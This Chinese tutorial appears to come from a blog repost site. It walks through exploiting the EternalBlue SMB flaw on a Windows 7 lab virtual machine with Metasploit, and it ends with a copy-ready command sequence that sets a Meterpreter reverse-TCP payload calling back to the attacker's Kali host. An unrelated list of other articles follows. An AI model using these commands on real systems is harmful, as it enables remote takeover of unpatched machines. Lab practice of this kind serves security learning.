【网络安全】用永恒之蓝(Eternal blue)测试windows系统的安全性

一、kali默认账户和密码都为kali

攻击机:Linux 的 kali
目标机:Windows7 x64

二、kali、metasploit、metasploit 攻击 windows操作系统、metasploit 攻击 永恒之蓝 全流程

①kali:是黑客攻击机。开源免费的Linux操作系统,含有300+渗透测试工具、Git树,集成了600+黑客工具。

②metasploit:kali最强渗透工具。开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续更新。让复杂的漏洞攻击流程变简单。

③metasploit 攻击 windows操作系统:如永恒之蓝漏洞,利用windows操作系统的SMB漏洞可以获取系统最高权限,端口为445。接着不法分子改造“永恒之蓝”制作了wannacry勒索病毒,被勒索支付高额赎金才能解密恢复文件。

④metasploit 攻击 永恒之蓝 全流程:

1>使用模块:use exploit/windows/smb/ms17_010_eternalblue

2>设置必选项:

查看必选项(required 为yes的就是必选项):show options

注:

搜索永恒之蓝漏洞:search ms17_010

使用模块:use+模块名或编号

只需要配置必选项即可。

端口有1-65535个,随意选择,只要端口未被占用,便可以使用。

可以自己搭建虚拟机去攻击。

三、启动metaspolit,进入msf命令行

①打开kali终端

②切换至root用户,使用命令:sudo su,输入kali的密码kali

③初始化metaspolit数据库,使用命令:msfdb init

④启动metaspolit(进入msf命令行),使用命令:msfconsole

注:

console=命令行接口

msf=metaspolit frame

exploit=攻击脚本(准备攻击)(火箭)

payload=攻击载荷(攻击过程中进行的操作)(火箭搭载的卫星)

meterpreter=攻击过程中获取的权限(开发者命名)=metaspolit后渗透的神器

description=描述

IP地址=计算机在互联网中的唯一标识=地址

target host=rhosts=RHOSTS=目标地址(加s因为一个攻击机可以攻击多个目标机)

target port=rport=目标的端口(永恒之蓝漏洞的默认端口=445)

listen address=lhost=LPORT=监听地址=攻击机的地址

listen port=lport=监听端口=攻击机的端口

命令行不区分大小写。

四、攻击另一台主机的流程

①搭建虚拟机环境,命令行cmd,输入ipconfig,获取目标的IP地址。

②在攻击机的终端,攻击目标地址,使用命令:set RHOSTS 具体目标地址或网段

例如:

具体目标地址为192.168.195.130

网段为:192.168.1.0-254

③【可不做】查看必选项(required 为yes的就是必选项):show options

④攻击后获取meterpreter,使用命令:set payload windows/x64/meterpreter/reverse_tcp

⑤设置kali的IP地址,使用命令:set LHOST kali的IP地址

先查看kali的IP地址:ifconfig的inet = 192.168.195.129

⑥设置监听端口,使用命令:set LPORT 端口号

⑦运行模块,使用命令:run

注:

通用命令:

windows查看IP地址:config 或 ipconfig 或 config -a

linux:

查看IP地址:ifconfig

帮助:help

查看选项:show options

退出到上一级:exit

清屏:clear

输入密码的时候不显示,自动读取键盘。

用户名密码:dwq

总结:

①sudo su

②kali

③msfconsole

④use exploit/windows/smb/ms17_010_eternalblue

⑤set RHOSTS 192.168.195.130

⑥set payload windows/x64/meterpreter/reverse_tcp

⑦set LHOST 192.168.195.129

⑧set LPORT 10000

⑨run

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/207170.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Linux Ubuntu protobuf 安装方法

文章目录 安装方法检验安装意外状况 安装方法 去GitHub官网找下载地址 安装 protobuf 21.11 GitHub 资源地址 选择安装版本 (是一个URL网址) 例如这里选用:protobuf-all-21.11.zip 资源 安装依赖库,执行指令 6. sudo apt-get …

class-dump 混淆加固、保护与优化原理

​ 进行逆向时,经常需要dump可执行文件的头文件,用以确定类信息和方法信息,为hook相关方法提供更加详细的数据.class-dump的主要用于检查存储在Mach O文件的Objective-C中的运行时信息,为类,类别和协议生成声明信息&am…

Redis7--基础篇5(管道、发布订阅)

管道是什么 管道(pipeline)可以一次性发送多条命令给服务端,服务端依次处理完完毕后,通过一条响应一次性将结果返回,通过减少客户端与redis的通信次数来实现降低往返延时时间。pipeline实现的原理是队列,先进先出特性就保证数据的…

10-微信小程序 图片 相机 二维码 动画相关API(实现选择相册、拍照、录像、动画)

10-微信小程序 图片 相机 二维码 动画相关API(实现选择相册、拍照、录像、动画) 文章目录 10.1选择图片wx.chooseImage(Object object)object.success 回调函数代码效果 10.2 预览图片wx.previewImage(Object object)代码效果 10.3 相机APICameraContext wx.createCameraContex…

科技平权,哪吒汽车又双叒OTA了

OTA升级“学霸”再有新动作。11月30日,平均一、两个月就会OTA升级一次的哪吒汽车再度“进化”,同时启动哪吒S和哪吒GT的新一轮OTA升级。此轮OTA升级,哪吒汽车不但将百万豪车才有的赛道级技术,价值数万元的哪吒卫士、一键遥控泊车功…

Everything结合内网穿透搭建在线资料库并实现随时随地远程访问

Everythingcpolar搭建在线资料库,实现随时随地访问 文章目录 Everythingcpolar搭建在线资料库,实现随时随地访问前言1.软件安装完成后,打开Everything2.登录cpolar官网 设置空白数据隧道3.将空白数据隧道与本地Everything软件结合起来总结 前…

ubuntu离线安装包下载和安装

一、确认本机ubuntu二的er发行版本 方法1: rootac810:/home/ac810/alex# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.6 LTS Release: 20.04 Codename: focal 方法2: rootac810:/home/ac810/alex# c…

深度学习手势识别 - yolo python opencv cnn 机器视觉 计算机竞赛

文章目录 0 前言1 课题背景2 卷积神经网络2.1卷积层2.2 池化层2.3 激活函数2.4 全连接层2.5 使用tensorflow中keras模块实现卷积神经网络 3 YOLOV53.1 网络架构图3.2 输入端3.3 基准网络3.4 Neck网络3.5 Head输出层 4 数据集准备4.1 数据标注简介4.2 数据保存 5 模型训练5.1 修…

基础课14——语音识别

ASR 是自动语音识别(Automatic Speech Recognition)的缩写,是一种将人类语音转换为文本的技术。ASR 系统可以处理实时音频流或已录制的音频文件,并将其转换为文本。它是一种自然语言处理技术,广泛应用于许多领域&#…

计算机毕业设计|基于SpringBoot+SSM+MyBatis框架的迷你仿天猫商城购物系统设计与实现

计算机毕业设计|基于SpringBoot+MyBatis框架的仿天猫商城购物系统设计与实现 迷你仿天猫商城是一个基于SpringBoot+SSM+MyBatis框架的综合性B2C电商平台,需求设计主要参考天猫商城的购物流程:用户从注册开始,到完成登录,浏览商品,加入购物车,进行下单,确认收货,评价等…

2023年小美赛认证杯D题:望远镜的微光因子(The Twilight Factor of a Telescope)思路模型代码解析

2023年小美赛认证杯D题:望远镜的微光因子(The Twilight Factor of a Telescope) 【请电脑打开本文链接,扫描下方名片中二维码,获取更多资料】 一、问题重述 当我们使用普通的光学望远镜在昏暗的光线中观察远处的目标…

AIGC实战——生成对抗网络(Generative Adversarial Network)

AIGC实战——生成对抗网络 0. 前言1. 生成对抗网络1.1 生成对抗网络核心思想1.2 深度卷积生成对抗网络 2. 数据集分析3. 构建深度卷积生成对抗网络3.1 判别器3.2 生成器3.3 DCGAN 模型训练 4. GAN 训练技巧4.1 判别器强于生成器4.2 生成器强于判别器4.3 信息量不足4.4 超参数 小…

【开源】基于Vue和SpringBoot的快递管理系统

项目编号: S 007 ,文末获取源码。 \color{red}{项目编号:S007,文末获取源码。} 项目编号:S007,文末获取源码。 目录 一、摘要1.1 项目介绍1.2 项目录屏 二、研究内容2.1 数据中心模块2.2 快递类型模块2.3 快…

【Linux】-信号-(信号的产生,保存,处理,以及os是怎么读取硬件的输入,硬件异常和coredump,定时器的原理简单的用户态和内核态的详细介绍)

💖作者:小树苗渴望变成参天大树🎈 🎉作者宣言:认真写好每一篇博客💤 🎊作者gitee:gitee✨ 💞作者专栏:C语言,数据结构初阶,Linux,C 动态规划算法🎄 如 果 你 …

Python datetime 字符串 相互转 datetime

字符串转 datetime from datetime import datetime# 定义要转换的日期时间字符串 dt_str "2021-09-30 15:48:36"# 使用datetime.strptime()函数进行转换 dt_obj datetime.strptime(dt_str, "%Y-%m-%d %H:%M:%S") print(dt_obj)datetime 转字符串 from …

(蓝桥杯)1125 第 4 场算法双周赛题解+AC代码(c++/java)

题目一&#xff1a;验题人的生日【算法赛】 验题人的生日【算法赛】 - 蓝桥云课 (lanqiao.cn) 思路&#xff1a; 1.又是偶数&#xff0c;又是质数&#xff0c;那么只有2喽 AC_Code:C #include <iostream> using namespace std; int main() {cout<<2;return 0; …

elasticsearch聚合、自动补全、数据同步

目录 一、数据聚合1.1 聚合的种类1.2 DSL实现聚合1.2.1 Bucket聚合语法1.2.2 聚合结果排序1.2.3 限定聚合范围1.2.4 Metric聚合语法 1.3 RestAPI实现聚合 二、自动补全2.1 拼音分词器2.2 自定义分词器2.3 自动补全查询2.4 RestAPI实现自动补全 三、数据同步3.1 思路分析3.1.1 同…

键盘打字盲打练习系列之指法练习——2

一.欢迎来到我的酒馆 盲打&#xff0c;指法练习&#xff01; 目录 一.欢迎来到我的酒馆二.开始练习 二.开始练习 前面一个章节简单地介绍了基准键位、字母键位和数字符号键位指法&#xff0c;在这个章节详细介绍指法。有了前面的章节的基础练习&#xff0c;相信大家对盲打也有了…

java设计模式学习之【适配器模式】

文章目录 引言适配器模式简介定义与用途&#xff1a;实现方式&#xff1a;类型 使用场景优势与劣势适配器模式在Spring中的应用多媒体播放器示例代码地址 引言 在我们的日常生活中&#xff0c;适配器无处不在&#xff1a;无论是将不同国家的插头转换成本地标准&#xff0c;还是…

golang WaitGroup的使用与底层实现

使用的go版本为 go1.21.2 首先我们写一个简单的WaitGroup的使用代码 package mainimport ("fmt""sync" )func main() {var wg sync.WaitGroupwg.Add(1)go func() {defer wg.Done()fmt.Println("xiaochuan")}()wg.Wait() }WaitGroup的基本使用场…